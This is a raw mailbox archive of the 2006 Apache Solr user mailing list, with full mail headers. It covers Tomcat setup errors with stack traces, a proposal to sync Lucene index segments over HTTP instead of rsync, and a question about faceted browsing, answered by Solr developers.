h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=c9eHLORFDYCgaxTrVfPQW9IuSJspxrvrtsXNdCBUWIwcHn64ScvnaB95LY/YVPzppcWh9vByWC2mqdPRIuAMkUcaLaKRKw55M/EqxKXzv0d6BsG5XuhD+Z9yaobZDdmSkVEfQnQIPvZhD15Lv/ACZcn8SGariOjhaeivkO3pPFk= Received: by 161.129.204.104 with SMTP id n15mr1160097pyk; Tue, 28 Mar 2006 06:32:31 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 28 Mar 2006 06:32:31 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 28 Mar 2006 09:32:31 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/28/06, Marcus Stratmann <[email protected]> wrote: > Well, there's no bin in my tomcat5 directory. Perhaps the Tomcat distribution looks different because it's bundled with your OS and they moved stuff around. >I start tomcat > using "/etc/init.d/tomcat5 start". May this be a problem? It could be a problem... it depends what that start script does. Solr looks in the current working directory for the solrconf directory, so it depends where that ends up when tomcat is started. It might be easier to download a recent Tomcat 5.5 distribution and get it working with that first... then try with the bundled version of Tomcat once you understand how everything works. -Yonik http://incubator.apache.org/solr Solr, The Open Source Lucene Search Server From [email protected] Tue Mar 28 14:40:04 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53286 invoked from network); 28 Mar 2006 14:40:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 14:40:03 -0000 Received: (qmail 2057 invoked by uid 500); 28 Mar 2006 14:40:03 -0000 Delivered-To: [email protected] Received: (qmail 2040 invoked by uid 500); 28 Mar 2006 14:40:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2031 invoked by uid 99); 28 Mar 2006 14:40:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 06:40:02 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=HTML_MESSAGE,RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 06:40:02 -0800 Received: by pproxy.gmail.com with SMTP id e30so263411pya for <[email protected]>; Tue, 28 Mar 2006 06:39:41 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=JfCbAMMkIgaoFg1pbFnPsFj5czjbbVBpxCVX4KyCUcugAhfcPXk53qu8+oXPEDubUZcKn/6BStPo+S/ixQ4C9VjpUfomEbTUVWXOrWgcHmjL9Ru2kpUTeBDuIDtxtGaKcMD+6DY5artamSlqNBj4CV5c0Lt8ERm0MbBxbqnbEm4= Received: by 161.129.204.104 with SMTP id b5mr1822944pym; Tue, 28 Mar 2006 06:39:38 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 28 Mar 2006 06:39:38 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 28 Mar 2006 09:39:38 -0500 From: "Bill Au" <[email protected]> To: [email protected], "jason rutherglen" <[email protected]> Subject: Re: Rsync In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_19151_14352406.1143556778423" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_19151_14352406.1143556778423 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline I think the segments file will also change if documents are deleted from th= e index. Other ways to distribute the index will works as long as: 1) it makes a copy of the index that is in a consistent state 2) it keeps track of files that have changed (normally only a small amount) and transfter them to the slave Lucene can certainly record a list of all new segment files added. I think the tricky part is to ensure that a consistent copy of the index is being distributed. Bill On 3/27/06, jason rutherglen <[email protected]> wrote: > > I was thinking, would it not be possible to avoid using rsync and record = a > list of all new segment files added (from within Lucene), and simply use > HTTP to sync down the newest ones? Perhaps only using rsync after an > optimize? Seems like if I understand Lucene correctly only new files are > created? > > > ------=_Part_19151_14352406.1143556778423-- From [email protected] Tue Mar 28 20:11:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53704 invoked from network); 28 Mar 2006 20:11:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 20:11:19 -0000 Received: (qmail 19619 invoked by uid 500); 28 Mar 2006 20:11:18 -0000 Delivered-To: [email protected] Received: (qmail 19558 invoked by uid 500); 28 Mar 2006 20:11:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19549 invoked by uid 99); 28 Mar 2006 20:11:17 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 12:11:17 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail.gmx.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 28 Mar 2006 12:11:15 -0800 Received: (qmail invoked by alias); 28 Mar 2006 20:10:53 -0000 Received: from dslb-084-061-045-015.pools.arcor-ip.net (EHLO [161.129.204.104]) [161.129.204.104] by mail.gmx.net (mp019) with SMTP; 28 Mar 2006 22:10:53 +0200 X-Authenticated: #586964 Date: Tue, 28 Mar 2006 22:10:53 +0200 From: Marcus Stratmann <[email protected]> X-Mailer: The Bat! (v3.71.01) Professional Reply-To: Marcus Stratmann <[email protected]> X-Priority: 3 (Normal) Message-ID: <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Y-GMX-Trusted: 0 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N > Solr looks in the current working directory for the solrconf > directory, so it depends where that ends up when tomcat is started. Meanwhile I found out that tomcat is located in /usr/share/tomcat5 and that there is a bin-directory in it, which I was searching for. A handfull of links are pointing to /var/lib/tomcat5 which I found first. So this time I started tomcat using the ./bin/startup.sh as recommended (had to set some environment variables first) but still got an error messages. However, this time a different one: javax.servlet.ServletException org.apache.jasper.runtime.PageContextImpl.doHandlePageException(PageContextImpl.java:846) org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImpl.java:779) org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:262) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:94) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:324) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:292) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:236) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) root cause java.lang.NoClassDefFoundError org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:67) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:94) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:324) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:292) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:236) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) At this point I gave up and tried a new approach. I changed configDir in Config.java to "/var/lib/tomcat5/solrconf/" (this is where I placed the configuration) and compiled the whole thing. I'm not sure, if this really could work (could it?) and in fact it didn't. But I think that the problem is not the location of the configuration files, but something different. What do these Security and Privilege messages mean showing up in the error message? java.lang.ExceptionInInitializerError org.apache.solr.update.SolrIndexConfig.<clinit>(SolrIndexConfig.java:34) org.apache.solr.core.SolrCore.<clinit>(SolrCore.java:71) org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:67) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:94) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:324) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:292) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:236) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) java.lang.reflect.Method.invoke(Method.java:585) org.apache.catalina.security.SecurityUtil$1.run(SecurityUtil.java:243) java.security.AccessController.doPrivileged(Native Method) javax.security.auth.Subject.doAsPrivileged(Subject.java:517) org.apache.catalina.security.SecurityUtil.execute(SecurityUtil.java:272) org.apache.catalina.security.SecurityUtil.doAsPrivilege(SecurityUtil.java:161) > It might be easier to download a recent Tomcat 5.5 distribution and > get it working with that first... then try with the bundled version of > Tomcat once you understand how everything works. Thanks Yonik, maybe I should try that, though I now think that the configuration is not the main problem. Btw, I don't like the way the config-files are handled. Searching them in the webapps-dir is not very elegant, I think. Instead they should be in /etc/solr or something (for linux; sorry, don't know if there's a common place where configs are placed under windows or other OSs). This will become a problem for me anyway because I'm planing to have three independent indexes which should be operated by three servlets. If my approach changing the variable configDir worked, this would really be fine. This way I could create three war-files containing different locations for the config (and yes, this wouldn't work with my proposed "elegant" way of putting everything to /etc/solr). Is this approach correct or do I have to make changes to the code elsewhere? Thanks, Marcus From [email protected] Tue Mar 28 21:16:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88346 invoked from network); 28 Mar 2006 21:16:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 21:16:53 -0000 Received: (qmail 44070 invoked by uid 500); 28 Mar 2006 21:16:53 -0000 Delivered-To: [email protected] Received: (qmail 44010 invoked by uid 500); 28 Mar 2006 21:16:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44001 invoked by uid 99); 28 Mar 2006 21:16:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 13:16:53 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 13:16:52 -0800 Received: by pproxy.gmail.com with SMTP id e30so77228pya for <[email protected]>; Tue, 28 Mar 2006 13:16:32 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=H7haH0HEzie3XsNlEL0pDrwi2Y5Qz/iKHFAqGkuRwxmOj3XBN94N3fQ9R6zdZzU7Co7PiMdWBT6aTX5BDIo6bSmQSCpgGRs655Ni9o5I0aS3ljoCNBP7A6P6ccmZc8t83XhCw5Ab+9IRlhsPgkRwObUAwbgMuIlBcrtEP0TpKwg= Received: by 161.129.204.104 with SMTP id p13mr184773pyi; Tue, 28 Mar 2006 13:16:32 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 28 Mar 2006 13:16:31 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 28 Mar 2006 16:16:31 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected], "Marcus Stratmann" <[email protected]> Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N > > It might be easier to download a recent Tomcat 5.5 distribution and > > get it working with that first... then try with the bundled version of > > Tomcat once you understand how everything works. > Thanks Yonik, maybe I should try that, though I now think that the > configuration is not the main problem. It may be Tomcat configuration/security set up by default on your Linux distribution. If you start from a normal tomcat distribution, we will be able to eliminate that difference. > Btw, I don't like the way the config-files are handled. Searching them in > the webapps-dir is not very elegant, I think. It's searching off the current-working-directory (which also isn't super elegant). > Instead they should be > in /etc/solr or something (for linux; sorry, don't know if there's a > common place where configs are placed under windows or other OSs). Even on linux, that would require root, and prevent multiple people from even trying out Solr on the same box. We needed a simple way to find config files without requiring user configuration. We're thinking of adding a solr.home java system property that would point to the solr directory. If we need to support multiple webapps, perhaps the property could have the webapp name as part of it's name. > This will become a problem for me anyway because I'm planing to have > three independent indexes which should be operated by three servlets. If > my approach changing the variable configDir worked, this would really > be fine. This way I could create three war-files containing different > locations for the config (and yes, this wouldn't work with my proposed > "elegant" way of putting everything to /etc/solr). Is this approach > correct or do I have to make changes to the code elsewhere? I don't think there is currently a way to do this. If you have any ideas (or even better, a patch) let us know. -Yonik From [email protected] Wed Mar 29 14:07:58 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5125 invoked from network); 29 Mar 2006 14:07:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 14:07:57 -0000 Received: (qmail 54320 invoked by uid 500); 29 Mar 2006 14:07:57 -0000 Delivered-To: [email protected] Received: (qmail 54259 invoked by uid 500); 29 Mar 2006 14:07:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54250 invoked by uid 99); 29 Mar 2006 14:07:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 06:07:56 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=HTML_MESSAGE,RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 06:07:55 -0800 Received: by pproxy.gmail.com with SMTP id e30so555287pya for <[email protected]>; Wed, 29 Mar 2006 06:07:35 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=sM0F4629uF8vg0IOHdcfZZjKDxpTQKb+iybhP0Vm23EXB/Fpb6jLRIW4BV1SCmYpdWSEsxXNlP27CYUMkEpXCfqtgYuptahE73SxnGKPSj/sk3egaF9ECxikoGwetx0Pexuku79e9lDd6rnO3irU+MvwABCT4WylQpqEviB9tiw= Received: by 161.129.204.104 with SMTP id p18mr634348pyj; Wed, 29 Mar 2006 06:07:35 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 29 Mar 2006 06:07:35 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 09:07:35 -0500 From: "Bill Au" <[email protected]> To: [email protected], "jason rutherglen" <[email protected]> Subject: Re: Rsync In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_1537_5125438.1143641255163" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_1537_5125438.1143641255163 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline The segments file will change when new segments are created. But what I really meant before was that the file deletable also changes when document are deleted from the index. Bill On 3/28/06, Bill Au <[email protected]> wrote: > > I think the segments file will also change if documents are deleted from > the index. > > Other ways to distribute the index will works as long as: > > 1) it makes a copy of the index that is in a consistent state > > 2) it keeps track of files that have changed (normally only a small > amount) > and transfter them to the slave > > Lucene can certainly record a list of all new segment files added. I > think the tricky part > is to ensure that a consistent copy of the index is being distributed. > > Bill > > > On 3/27/06, jason rutherglen <[email protected]> wrote: > > > > I was thinking, would it not be possible to avoid using rsync and recor= d > > a list of all new segment files added (from within Lucene), and simply = use > > HTTP to sync down the newest ones? Perhaps only using rsync after an > > optimize? Seems like if I understand Lucene correctly only new files a= re > > created? > > > > > > > ------=_Part_1537_5125438.1143641255163-- From [email protected] Wed Mar 29 18:29:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63745 invoked from network); 29 Mar 2006 18:29:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 18:29:11 -0000 Received: (qmail 62292 invoked by uid 500); 29 Mar 2006 18:29:11 -0000 Delivered-To: [email protected] Received: (qmail 62274 invoked by uid 500); 29 Mar 2006 18:29:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 62265 invoked by uid 99); 29 Mar 2006 18:29:10 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 10:29:10 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 10:29:10 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 8CA9233D337; Wed, 29 Mar 2006 13:28:47 -0500 (EST) Received: from [161.129.204.104] (d-128-193-79.bootp.Virginia.EDU [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 1ED6233D30F for <[email protected]>; Wed, 29 Mar 2006 13:28:46 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v749.3) Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed To: [email protected] From: Erik Hatcher <[email protected]> Subject: faceted browsing Date: Wed, 29 Mar 2006 13:28:42 -0500 X-Mailer: Apple Mail (2.749.3) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Level: X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, score=-2.6 required=5.0 tests=BAYES_00 autolearn=ham version=3.0.1 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I saw Yonik mentioned faceted browsing as something coming in the future of Solr, but I had thought it was one of the initial features from seeing this announcement ages ago: <http://www.nabble.com/Announcement%3A-Lucene-powering-CNET.com- Product-Category-Listings-t266441.html#a748420> If facets are part of the current Solr codebase, how are they configured and returned in the response? If they aren't currently possible with Solr, what would it take to implement it? I'm still, obviously, just scratching the surface of Solr as I evaluate it for replacing my custom XML-RPC based search server which does rudimentary facets using Filters and BitSet operations. By faceted browsing, a Query is used to search, Hits are returned, but also based on a subset of the fields (indexed, untokenized fields) the number of documents in each of these "facet" fields is returned as well to show counts by each facet. Thanks, Erik From [email protected] Wed Mar 29 18:43:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70969 invoked from network); 29 Mar 2006 18:43:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 18:43:13 -0000 Received: (qmail 85920 invoked by uid 500); 29 Mar 2006 18:43:11 -0000 Delivered-To: [email protected] Received: (qmail 85875 invoked by uid 500); 29 Mar 2006 18:43:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85779 invoked by uid 99); 29 Mar 2006 18:43:10 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 10:43:10 -0800 X-ASF-Spam-Status: No, hits=2.3 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,FORGED_YAHOO_RCVD,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50006.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 29 Mar 2006 10:43:10 -0800 Received: (qmail 38233 invoked by uid 60001); 29 Mar 2006 18:42:46 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Date:From:Reply-To:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=bCo0fj4thZrpeQycThz9EmrZzFAxDEK+XUBrMfoE67AQ/Ae+Zj6gVKu1FA28SODSLirqIwvaGTOCP1+3Rvvbj8f11MGUicEnxrkgqX5oBvAk8uQnUri2G+A7YV1T3mk0/3SYJtg8l+nP0opniX4Ts659OU3XV1pIu0hohe5zwZ4= ; Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 10:42:46 -0800 (PST) From: jason rutherglen <[email protected]> Reply-To: jason rutherglen <[email protected]> Subject: Re: Rsync To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-854980403-1143657766=:37880" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-854980403-1143657766=:37880 Content-Type: text/plain; charset=us-ascii Perhaps a future project to increase the speed of the syncing to sub-minute times. Sounds like two files will change, in addition to segment files being added. Is this correct? Or maybe other pieces such as cache reloading would make this more difficult. ----- Original Message ---- From: Bill Au <[email protected]> To: [email protected]; jason rutherglen <[email protected]> Sent: Wednesday, March 29, 2006 6:07:35 AM Subject: Re: Rsync The segments file will change when new segments are created. But what I really meant before was that the file deletable also changes when document are deleted from the index. Bill On 3/28/06, Bill Au <[email protected]> wrote: > > I think the segments file will also change if documents are deleted from > the index. > > Other ways to distribute the index will works as long as: > > 1) it makes a copy of the index that is in a consistent state > > 2) it keeps track of files that have changed (normally only a small > amount) > and transfter them to the slave > > Lucene can certainly record a list of all new segment files added. I > think the tricky part > is to ensure that a consistent copy of the index is being distributed. > > Bill > > > On 3/27/06, jason rutherglen <[email protected]> wrote: > > > > I was thinking, would it not be possible to avoid using rsync and record > > a list of all new segment files added (from within Lucene), and simply use > > HTTP to sync down the newest ones? Perhaps only using rsync after an > > optimize? Seems like if I understand Lucene correctly only new files are > > created? > > > > > > > --0-854980403-1143657766=:37880-- From [email protected] Wed Mar 29 18:46:26 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72450 invoked from network); 29 Mar 2006 18:46:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 18:46:26 -0000 Received: (qmail 91948 invoked by uid 500); 29 Mar 2006 18:46:25 -0000 Delivered-To: [email protected] Received: (qmail 91886 invoked by uid 500); 29 Mar 2006 18:46:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91876 invoked by uid 99); 29 Mar 2006 18:46:25 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 10:46:25 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 10:46:24 -0800 Received: by pproxy.gmail.com with SMTP id i75so9519pye for <[email protected]>; Wed, 29 Mar 2006 10:46:03 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=OJq4Vc7KYrbuB/eZsCr+b1+ZEnDLVcGuDEUqvuSMHusASGUsG12PByC0d/cLTiutZHPmP1WaaCBjFPrLDKBtJeiA3/jLCc+p8DqBpJ/hiAj9RlGZb8v/pcU+FucnZdm2F2vK4dRlREz+DMzLvTeti+5lGb7D9BztUohVpZ5ycfg= Received: by 161.129.204.104 with SMTP id v10mr129699pyj; Wed, 29 Mar 2006 10:46:01 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 29 Mar 2006 10:46:01 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 13:46:01 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: faceted browsing In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Solr has a lot of support to do faceted browsing, but one must currently write a custom query handler to implement the faceting logic. The support includes: - custom query handlers: - the ability to return more data than just a list of documents - a filter cache with autowarming, for fast access to the filter for each facet - more memory efficient and faster intersecting filter representations The part I want in the future is simple faceted browsing without having to write any plugins or Java code.. so we need to come up with a syntax to represent the desired faceting operations, and then implement that syntax in the standard request handler. To implement a custom query handler, you need to implement SolrRequestHandl= er http://incubator.apache.org/solr/docs/api/org/apache/solr/request/SolrReque= stHandler.html and register it in solrconfig.xml -Yonik On 3/29/06, Erik Hatcher <[email protected]> wrote: > I saw Yonik mentioned faceted browsing as something coming in the > future of Solr, but I had thought it was one of the initial features > from seeing this announcement ages ago: > > <http://www.nabble.com/Announcement%3A-Lucene-powering-CNET.com- > Product-Category-Listings-t266441.html#a748420> > > If facets are part of the current Solr codebase, how are they > configured and returned in the response? > > If they aren't currently possible with Solr, what would it take to > implement it? > > I'm still, obviously, just scratching the surface of Solr as I > evaluate it for replacing my custom XML-RPC based search server which > does rudimentary facets using Filters and BitSet operations. > > By faceted browsing, a Query is used to search, Hits are returned, > but also based on a subset of the fields (indexed, untokenized > fields) the number of documents in each of these "facet" fields is > returned as well to show counts by each facet. > > Thanks, > Erik > From [email protected] Wed Mar 29 18:49:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73786 invoked from network); 29 Mar 2006 18:49:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 18:49:06 -0000 Received: (qmail 98508 invoked by uid 500); 29 Mar 2006 18:49:06 -0000 Delivered-To: [email protected] Received: (qmail 98482 invoked by uid 500); 29 Mar 2006 18:49:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98473 invoked by uid 99); 29 Mar 2006 18:49:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 10:49:06 -0800 X-ASF-Spam-Status: No, hits=-0.0 